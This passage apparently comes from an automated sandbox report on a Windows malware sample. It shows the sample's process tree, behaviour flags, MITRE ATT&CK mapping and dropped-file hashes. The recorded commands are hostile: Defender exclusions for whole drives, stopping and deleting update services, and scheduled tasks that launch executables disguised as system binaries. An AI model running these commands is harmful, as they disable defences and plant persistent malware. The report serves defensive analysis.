ABoACAAPAAjAHkAdABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGcAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBHAGUAdAAuAGUAeABlACcAKQA8ACMAegB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBxAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAdgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAYwBwAHQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAawBiAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAZABrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAE8AdQB0AHAAdQB0AC4AZQB4AGUAJwApADwAIwBoAGEAYQAjAD4A"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#wed#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try on another PC!','','OK','Error')<#pel#>;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Users\Admin\AppData\Roaming\Syshost.exe
"C:\Users\Admin\AppData\Roaming\Syshost.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:556

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C schtasks /create /tn FWDCznNyRu /tr C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
4⤵
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn FWDCznNyRu /tr C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe /st 00:00 /du 9999:59 /sc once /ri 1 /f
5⤵
- Creates scheduled task(s)
PID:4496

C:\Users\Admin\AppData\Roaming\LicGet.exe
"C:\Users\Admin\AppData\Roaming\LicGet.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:448

C:\Users\Admin\AppData\Roaming\LicCheck.exe
"C:\Users\Admin\AppData\Roaming\LicCheck.exe"
3⤵
- Executes dropped EXE
PID:4792

C:\Users\Admin\AppData\Local\Temp\LicOutput.exe
"C:\Users\Admin\AppData\Local\Temp\LicOutput.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1432

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\agentBrowsersavesRefBroker\metokn3Gpa5i.vbe"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\agentBrowsersavesRefBroker\DYj6G9.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:4560

C:\agentBrowsersavesRefBroker\SurrogateDll.exe
"C:\agentBrowsersavesRefBroker\SurrogateDll.exe"
6⤵
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
7⤵
PID:4040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/agentBrowsersavesRefBroker/'
7⤵
PID:1432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
7⤵
PID:756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
7⤵
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
7⤵
PID:1904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
7⤵
PID:3596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
7⤵
PID:4256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
7⤵
PID:1636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
7⤵
PID:5032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
7⤵
PID:3636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
7⤵
PID:4784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
7⤵
PID:2292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
7⤵
PID:4140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zt3JT3T8RF.bat"
7⤵
PID:388

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
8⤵
PID:4776

C:\Recovery\WindowsRE\cmd.exe
"C:\Recovery\WindowsRE\cmd.exe"
8⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:4696

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\888d49a2-d628-4fd0-9619-f011d50b65cf.vbs"
9⤵
PID:1508

C:\Recovery\WindowsRE\cmd.exe
C:\Recovery\WindowsRE\cmd.exe
10⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:400

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\610e3479-09b1-4bf1-85ce-24b1c9b675bb.vbs"
11⤵
PID:1852

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5f13418a-d4c3-4af4-8c28-c9a5ae91091d.vbs"
11⤵
PID:4784

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\25ee8439-fe29-4117-9254-64ca829b44a0.vbs"
9⤵
PID:3460

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3252

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4800

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5048

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3492

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3992

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4816

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4860

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4316

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:3560

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1324

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4784

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:2568

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4320

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#owhqpc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\LicGet.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:2056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\agentBrowsersavesRefBroker\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\agentBrowsersavesRefBroker\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\agentBrowsersavesRefBroker\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\odt\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\odt\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\odt\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\odt\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3152

C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe
C:\Users\Admin\AppData\Roaming\FWDCznNyRu\MeWIPLCRzw.exe
1⤵
- Executes dropped EXE
PID:2336

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\WindowsRE\cmd.exe
Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\Recovery\WindowsRE\cmd.exe
Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\Recovery\WindowsRE\cmd.exe
Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cmd.exe.log
Filesize
1KB

MD5
4a667f150a4d1d02f53a9f24d89d53d1

SHA1
306e125c9edce66f28fdb63e6c4ca5c9ad6e8c97

SHA256
414659decfd237dde09625a49811e03b5b30ee06ee2ee97ea8bcfac394d281fd

SHA512
4edd8e73ce03488a6d92750a782cd4042fbb54a5b3f8d8ba3ea227fda0653c2cd84f0c5d64976c7cdc1f518a2fdc8ff10e2a015ec7acf3cd01b0d62bc98542d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
614f88cf39eb3223246afec4bf1463b4

SHA1
74d738ee6fdada75ac1ef1645073005e3f6b6cfb

SHA256
021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

SHA512
84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0ebccc033a2da1d0601a4b23a1c7444d

SHA1
7fda1e23d8b4956f9f07df6fe940438acd3e620e

SHA256
80d4a73c2140e73f8f9c7e03feee6cf20e100247759fae93356e5e918576db27

SHA512
02fe8a687a1329e53a39b9956fba6c5253d1b4861e5de5ae71fa0684a007342f8e5b80474e8b1721ef0f9044a65c7f6c9b541117ea5059f7dfb57335abda1b2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0ebccc033a2da1d0601a4b23a1c7444d

SHA1
7fda1e23d8b4956f9f07df6fe940438acd3e620e

SHA256
80d4a73c2140e73f8f9c7e03feee6cf20e100247759fae93356e5e918576db27

SHA512
02fe8a687a1329e53a39b9956fba6c5253d1b4861e5de5ae71fa0684a007342f8e5b80474e8b1721ef0f9044a65c7f6c9b541117ea5059f7dfb57335abda1b2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9a8c63acacd93c2ab0b47464e9a50823

SHA1
ef2e1336e5bc844ff3bf64cef19b58453459553c

SHA256
37150b2aa4bc93d88e21914cedb6f1928659a20fad8c5cd9a15cc72997ac43d9

SHA512
30b86f6c470fa76e0d95c9b7321d1f5d8e3799b04f9236664b064de24e0a7544910e7edae19be9c9639716526d0fdca09b71f48c9950d1377945dd666ec1c7c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d4e74e5f9dddf11c63fea9ad87f18dea

SHA1
8bf8f01e30cf1edf12c2dd3750efa38835871c3e

SHA256
2e7aff979a3bd81a98c16c44f12dcb99501847c63b578324bd93231bd1e636d7

SHA512
39018e454811b6c9a8c6d4a4dde8d91baf28ca931807272dee69a1e12a61b268c09b249ef6fa057b8b91f241b5592227fe49aa545c4b1d89b1876e93ca6830a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Temp\16dc12fcdc88c18a62bdab1ff6f79c8bf175bb67.exe
Filesize
1.7MB

MD5
5420cbcfdf9d9cde25c9587c240354dc

SHA1
c87ddf64e1acd3b64df896eb091f97717d438076

SHA256
6f5ab9b6c6bbbb3930d8d5e3efbd1432c2cbbcb7a4153a85174a9e1cae7475e5

SHA512
14de4a786f4cb314bb66a28280204cbfb3547722fe6466f65de242897e1fbf49575c6b9b056dd8cdb9074c2df69a0d7db6151a3aa2329ff51d269caeb0bb92e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\25ee8439-fe29-4117-9254-64ca829b44a0.vbs
Filesize
481B

MD5
6f9db2998e0f9363dcb8bd3aba155c3b

SHA1
50ac8df491ce4c719fc90089745d00fae836d5da

SHA256
b5a99ccb518486d50e5585f48519cbdce5cb796fbb80657ed02ac10d01b47fbf

SHA512
